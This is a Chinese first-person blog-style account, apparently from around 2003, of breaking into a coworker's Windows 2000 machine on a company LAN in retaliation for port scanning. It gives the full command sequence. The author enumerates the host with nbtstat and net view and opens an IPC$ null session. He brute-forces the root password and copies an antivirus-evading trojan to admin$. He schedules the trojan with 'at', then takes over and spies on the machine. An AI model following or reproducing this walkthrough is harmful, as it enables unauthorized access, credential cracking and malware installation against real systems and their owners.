某年某月的某一天偶心情郁闷之极,在公司上网,但是网路又不通~~只能上内部网。想打开cs看看有人建主机没,突然发现程序运行速度极慢!cpu的使用率到了100%,_blank">防火墙频繁报警,真tmd的歇特! 打开我的天网,看了看日志: 190.xx.xxx.x试图连接本机的1-n号端口,该操作被拒绝。 显然是局域网内哪个家伙又再扫描我,(为什么要说“又”呢?它以前天天扫,只不过我没当回事,今天我心情不爽,它又来了,更由于才进单位很多高手看我这小弟弟不顺眼,但可惜的很,都是平面高手而已)但是不能排除它被人家当跳板的可能性。也好了,反正正好让他们看看我的手段! 于是,我停下了手中的工作,随便从工具箱中拉了一个端口扫描器,小扫了一下对方开放的端口。 139端口开放。 只开这一个端口,看样子它还可以。 先看看对方的基本情况。 e:/>nbtstat -a 190.xx.xxx.x 本地连接: node ipaddress: [190.xx.xxx.me(注:这个是我的ip:)] scope id: [] netbios remote machine name table name type status --------------------------------------------- xx-109 <00> unique registered workgroup <00> group registered xx-109 <20> unique registered workgroup <1e> group registered mac address = 00-e0-4c-90-43-44 (mac地址) 这个主机的主机名是xx-009,工作组名是009 好了,看看对方主机上有什么共享资源 c:/>net view //190.xx.xxx.x 在 //190.xx.xxx.x 的共享资源 资源共享名 类型 用途 注释 ---------------------------------------- shareddocs disk 命令成功完成。 有共享资源就好。 载入nbt快取,也就是重新装入远程的缓冲的名字表。 c:/>nbtstat -r successful purge and preload of the nbt remote cache name table. 列出远程名字缓冲区(name cache) c:/>nbtstat -c 本地连接: node ipaddress: [190.xx.xxx.me(我的ip)] scope id: [] no names in cache 这个结果不大好。 我去网上邻居那里把目标主机找了出来,点击进入,只有shareddocs,打印机和任务计划三项可以让我利用。 不过这样已经很不错了。 我的想法就是把木马上传,然后在任务计划里面写入木马路径,添加一项几分钟后运行的任务,这样这台主机就over了。 不过想的很天真~~,我右键新建了一个计划任务,然后设定属性,但是这时弹出了错误对话框: 常规页面初始化失败,拒绝访问。 看来不行。只能另想办法了,试试别的。 c:/>net use //190.xx.xxx.x/ipc$ "" /user:"" 空连接建立成功了,找到了流光,用它来探测用户列表,马上就出来了:root 在win2000系统下起这么个用户名,看来也知道root是干什么的,哈。那么别人用它的主机当跳板的可能性降低了很多,因为整天没事扫别人系统的那些newbie一定不知道这些的(公司站的某些人不要对号入座呀:)。分析的精彩吧,鼓掌~~ 用户列表出来了(root:admin权限),接下来当然是探测密码了,用流光自带的密码档探测了一下,未遂~ 于是我就自己根据用户名和主机名什么的用字典生成器弄了一个密码档。(其实,这也是没办法的办法) 还好,侥幸让我成功了一次,密码被探了出来:ooked**(那个*是他们的号,我就不公布了) 这样就结束了。hoho~~欺负偶浪子混这么多年是白给的啊? c:/>net use //190.xx.xxx.x/ipc$ "rootxxx" /user:root 命令成功完成 c:/>copy sysdll.exe //190.xx.xxx.x/admin$ 已复制 1个文件 c:/>net time //190.xx.xxx.x //190.xx.xxx.x 的当前时间是 2003/2/12 下午 15:29 命令成功完成 c:/at //190.xx.xxx.x 00:00 sysdll.exe 新加了一项作业,其作业 id = 1 注:sysdll.exe是我加压缩的一个木马,用金山病毒库试了一下,暂时还不被查杀。数分钟后,这个机子已经是我的了。翻了翻它的文件夹,里面尽是一些色情图片和一些早期的黑客工具。看来搞平面的确实需要多了解生活啊,偶无言~~ 看了一下它的屏幕,正在使用一个扫描器扫我。我帮你解决了吧。。 以上是一个很简单的入侵过程,虽然碰了点小石头,但是总的来说还是比较顺利的。这篇是临时写的,希望同事们继续高举毛主席邓小平伟大旗帜,尊实***同志三个代表的重要思想,做四好新人不要随便攻击他人计算机(尤其是可能放了某重要秘密的),这样对自己没有什么好处。
()
